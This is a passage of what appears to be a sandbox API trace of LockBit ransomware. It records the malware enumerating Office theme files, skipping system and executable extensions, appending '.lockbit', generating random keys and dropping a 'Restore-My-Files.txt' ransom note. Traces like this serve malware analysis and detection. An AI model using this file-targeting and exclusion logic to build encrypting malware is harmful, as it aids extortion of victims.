(lpString1=".mdf", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.668] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.669] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.669] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.669] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.669] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.669] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.669] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml.lockbit") returned 87 [0195.669] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\concourse.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.670] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.670] malloc (_Size=0x40068) returned 0x3df0008 [0195.670] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3526) returned 1 [0195.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.671] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.671] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.671] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.687] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.687] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.687] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0195.687] free (_Block=0x1fa2ed8) [0195.687] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Concourse.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.687] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.687] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.687] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13f36100, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x13f36100, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xefc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Couture.xml", cAlternateFileName="")) returned 1 [0195.687] lstrcmpiW (lpString1=".", lpString2="Couture.xml") returned -1 [0195.687] lstrcmpiW (lpString1="..", lpString2="Couture.xml") returned -1 [0195.687] PathFindExtensionW (pszPath="Couture.xml") returned=".xml" [0195.687] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.687] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.688] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.689] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Couture.xml") returned 1 [0195.689] lstrcmpiW (lpString1="ntldr", lpString2="Couture.xml") returned 1 [0195.689] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Couture.xml") returned 1 [0195.689] lstrcmpiW (lpString1="bootsect.bak", lpString2="Couture.xml") returned -1 [0195.689] lstrcmpiW (lpString1="autorun.inf", lpString2="Couture.xml") returned -1 [0195.689] lstrcmpiW (lpString1="thumbs.db", lpString2="Couture.xml") returned 1 [0195.690] lstrcmpiW (lpString1="iconcache.db", lpString2="Couture.xml") returned 1 [0195.690] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.690] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml") returned=".xml" [0195.690] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.690] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.690] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.691] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.691] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.691] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.691] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.691] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.691] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.691] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml.lockbit") returned 85 [0195.691] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\couture.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.693] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.693] malloc (_Size=0x40068) returned 0x3df0008 [0195.693] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3836) returned 1 [0195.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.695] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.700] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.700] malloc (_Size=0xc0) returned 0x1fa2ed8 [0195.700] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0195.700] free (_Block=0x1fa2ed8) [0195.700] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Couture.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.700] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.700] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.700] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15248e00, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15248e00, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xe48, dwReserved0=0x0, dwReserved1=0x0, cFileName="Elemental.xml", cAlternateFileName="ELEMEN~1.XML")) returned 1 [0195.700] lstrcmpiW (lpString1=".", lpString2="Elemental.xml") returned -1 [0195.700] lstrcmpiW (lpString1="..", lpString2="Elemental.xml") returned -1 [0195.700] PathFindExtensionW (pszPath="Elemental.xml") returned=".xml" [0195.700] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.700] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.700] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.700] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.700] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.700] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.701] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Elemental.xml") returned 1 [0195.702] lstrcmpiW (lpString1="ntldr", lpString2="Elemental.xml") returned 1 [0195.702] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Elemental.xml") returned 1 [0195.702] lstrcmpiW (lpString1="bootsect.bak", lpString2="Elemental.xml") returned -1 [0195.702] lstrcmpiW (lpString1="autorun.inf", lpString2="Elemental.xml") returned -1 [0195.702] lstrcmpiW (lpString1="thumbs.db", lpString2="Elemental.xml") returned 1 [0195.702] lstrcmpiW (lpString1="iconcache.db", lpString2="Elemental.xml") returned 1 [0195.702] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.702] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml") returned=".xml" [0195.702] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.702] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.702] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.703] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.703] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml.lockbit") returned 87 [0195.703] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\elemental.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.705] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.705] malloc (_Size=0x40068) returned 0x3df0008 [0195.705] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3656) returned 1 [0195.705] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.706] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.706] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.706] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.706] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.712] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.712] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.712] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0195.712] free (_Block=0x1fa2ed8) [0195.712] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Elemental.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.712] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.712] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.712] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0301b00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528a9ed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf0301b00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xef5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Equity.xml", cAlternateFileName="")) returned 1 [0195.712] lstrcmpiW (lpString1=".", lpString2="Equity.xml") returned -1 [0195.712] lstrcmpiW (lpString1="..", lpString2="Equity.xml") returned -1 [0195.712] PathFindExtensionW (pszPath="Equity.xml") returned=".xml" [0195.712] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.712] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.712] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.713] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.713] 